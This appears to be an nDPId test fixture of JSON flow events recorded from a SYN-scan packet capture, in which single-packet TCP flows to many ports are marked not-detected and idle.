+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 